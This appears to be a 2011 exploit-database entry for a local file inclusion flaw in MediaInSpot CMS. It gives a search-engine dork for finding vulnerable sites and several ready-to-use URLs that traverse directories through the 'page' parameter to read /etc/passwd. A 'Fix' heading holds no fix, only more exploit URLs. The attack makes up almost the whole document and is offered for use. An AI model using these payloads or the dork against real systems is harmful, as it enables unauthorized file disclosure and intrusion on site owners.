MediaInSpot CMS - Local File Inclusion (2)



EKU-ID: 23268 CVE: OSVDB-ID:
Author: wlhaan haker Published: 2011-05-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/

#Dork:"
"Powred By Media In Spot""

#Author : wlhaan haker <iit[at]hotmail.com>


###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

###############################################################################################################
Fix:

demo

http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd